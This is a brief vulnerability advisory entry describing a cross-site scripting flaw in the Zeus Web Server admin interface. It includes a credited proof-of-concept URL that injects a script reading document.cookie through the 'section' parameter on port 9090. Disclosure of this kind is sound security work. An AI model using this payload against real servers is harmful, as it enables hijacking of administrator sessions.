• info
• discussion
• exploit
• solution
• references

Zeus Web Server Admin Interface Cross Site Scripting Vulnerability

The following proof of concept was supplied by euronymous <just-a-user@yandex.ru>:

http://hostname:9090/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>